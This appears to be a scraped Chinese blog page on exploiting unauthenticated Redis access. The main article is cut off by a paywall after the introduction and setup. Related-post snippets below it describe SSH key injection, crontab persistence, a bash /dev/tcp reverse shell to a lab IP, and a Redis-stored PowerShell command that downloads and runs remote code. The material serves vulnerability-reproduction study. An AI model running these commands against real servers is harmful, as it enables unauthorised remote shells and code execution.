redis 未授权漏洞以及利用

最新推荐文章于 2024-09-15 23:49:46 发布

BROTHERYY

最新推荐文章于 2024-09-15 23:49:46 发布

阅读量564

点赞数

CC 4.0 BY-SA版权

分类专栏：漏洞复现

本文链接：https://blog.youkuaiyun.com/BROTHERYY/article/details/109008889

1.redis 介绍

REmote DIctionary Server(Redis) 是完全开源免费的，遵守BSD协议，Redis是一个由Salvatore Sanfilippo写的key-value存储系统。。

Redis 与其他的key - value 缓存产品有以下三个特点：

1.Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的时候可以再次加载进行使用。
2.Redis不仅仅支持简单的key-value类型的数据，同时还提供list，set，zset，hash等数据结构的存储。
3.Redis支持数据的备份，即master-slave模式的数据备份。

Redis因配置不当可造成未授权访问。攻击者无需通过身份认证便可访问到内部数据，造成敏感信息泄露，也可以恶意执行flushall来清空所有数据。如果Redis以root身份运行，可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器。

2.redis环境搭建

windows
windows直接下载然后解压就可以了

linux

wget http://download.redis.io/releases/redis-6.0.8.tar.gz
ls
tar xzf redis-6.0.8.tar.gz 
cd

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

BROTHERYY

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

redis未授权访问getshell

Jiajiajiang_的博客

08-02

5651

参考：https://blog.csdn.net/guxiaoguo/article/details/78913245 利用条件：linux，对方开启ssh 用到的工具：kali nmap redis 公司测试服务器：10.0.3.45 redis默认端口：6379 主要思路：利用redis未授权访问命令给root账户写入SSH公钥文件，然后通过SSH登录服务器 ...

Redis未授权访问漏洞利用姿势的五种基础姿势

weixin_74182283的博客

03-27

1204

进行一个定时任务的配置指定路径与文件名，set 一个键名叫x 后面那一堆都是他的值 \n是为了隔开其他的信息（同第一段那个意思）其中的*表示时间（年月日）这里为*表示每分钟都在执行这个任务（将数据一直反弹）后面的/bin/bashxx就是一个反弹shell的正常写法，确认反弹到的主机（将靶机的信息反弹到攻击机kali上，ip就写kali的 8888为开启监听的端口）0>& 这玩意就是将标准输入重定向到标准输出，确保都能被执行到确保交互性，反弹shell不会轻易断开。

参与评论您还未登录，请先登录后发表或查看评论

Redis未授权访问利用

LiuSiXian的博客

07-14

980

Redis服务器:192.168.100.10攻击机:192.168.15.101。

Redis未授权访问漏洞的利用

weixin_68681298的博客

07-26

326

bash -i >& /dev/tcp/192.168.142.44/7777 0>&1：打开一个交互式的bash终端，与远程机器建立一个socket连接将标准错误输出合并到标准输出中，将标准输入重定向到标准输出中。启动Redis服务：/usr/local/soft/redis-6.0.9/src/redis-server /usr/local/soft/redis-6.0.9/redis.conf。进入客户端：/usr/local/soft/redis-6.0.9/src/redis-cli。

redis未授权访问漏洞的利用

2301_80127209的博客

11-16

288

当redis服务(6379)端口对外开放且未作密码认证时，任意用户可未授权访问redis服务并操作获取其数据。攻击机：10.1.1.100 kali目标靶机：10.1.1.200。

redis未授权的六种利用方法(linux与windows)

最新发布

JIN_7X的博客

09-15

1852

Redis（Remote Dictionary Server ），即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。有一个利用脚本，https://github.com/n0b0dyCN/redis-rogue-server，但是这个反弹shell有问题，退出了redis也跟着退出了。，发现返回带中文不能解码，开始怀疑是编码的问题，后来发现是返回的数据带空格，把中文字节分开了，去上面项目的。

关于Redis未授权访问漏洞利用的介绍与修复建议

01-21

本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容，文中对该漏洞进行了详细，并给出了相对应的修复/安全建议，下面话不多说了，来一起看看详细的介绍吧。一、漏洞介绍 Redis 默认情况下，会绑定在 0.0....

redis未授权漏洞详细利用

pray030的博客

02-23

3731

redis未授权访问利用汇总

今天是几号的博客

03-17

1371

原理就是在数据库中插入一条数据，将本机的公钥作为value，key值随意，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys，把缓冲的数据保存在文件里，这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务，每个任务以创建者的名字命名，比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。

Redis未授权访问漏洞利用

weixin_65049289的博客

01-17

636

Redis未授权访问漏洞

redis未授权访问漏洞利用

weixin_53562844的博客

05-07

2287

redis是一个key-value存储系统，拥有强大的功能，目前普及率很高，redis是用ansic语言编写，支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的APL，reids默认端口是6379。造成未授权漏洞的原因是安全配置未作限制，redis默认情况是空密码连接。利用条件：redis <3.2 利用原理：redis绑定在0.0.0.0：6379，且没有进行添加安全策略，直接暴露在公网，默认是空密码，可以让攻击者免密码登录redis服务。靶机：192.

Redis未授权利用方式总结

hot_milk1的博客

08-07

1234

目前的大多数网站搭建的Redis 均采用 docker 一键部署的方式，而 docker 镜像中的 redis 默认不是以 root 权限运行的，也就是说即使拿下这台 redis，我们也只能在对方服务器的本地内网中漫游，当然还是会有部分 redis 部署在服务器中。

redis未授权漏洞利用总结

Echo__h的博客

09-09

1332

redis默认端口6379，在默认配置情况下密码为空，因此如果将redis暴露到公网，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据，并且可以利用redis写入shell、写入SSH公钥等危险操作。

Redis未授权最全利用方式

swordheart的博客

01-10

2684

0x00 利用计划任务反弹shell 靶机地址：192.168.230.142 kail地址：192.168.230.128 启动靶机redis docker环境

redis未授权访问的利用方式

Redredredfish的博客

08-23

1616

redis未授权访问的利用方式漏洞原理： Redis<3.2默认情况下，会绑定在0.0.0.0:6379，如果没有进行采用相关的安全策略，比如添加防火墙黑白名单等等，这样会将Redis服务暴露在公网上。如果在没有设置密码(默认为空)的情况下，会导致任意用户可以未授权访问Redis以及读取Redis的数据。攻击者利用Redis自身的提供的config命令，可以进行写文件操作，还可以将ssh公钥写入目标服务器./root/.ssh下的authotrized_keys 文件中，进而可以利用对应私钥直接使

Redis未授权访问漏洞复现与利用

Forget_liu的博客

06-07

3027

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

windows环境redis未授权利用手法总结

2401_84466336的博客

05-29

1747

redis 目标ip:6379>set x "/r/n/r/npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"/r/n/r/n。也就是说在`c:/windows/system32/wbem/mof/`目录下的mof文件会每5秒自动执行一次，这样就不需要重启机器就能获取权限了。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

Redis未授权访问漏洞的重现与利用

qq_40882763的博客

03-24

2280

Redis 默认情况下，会绑定在 0.0.0.0:6379，，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。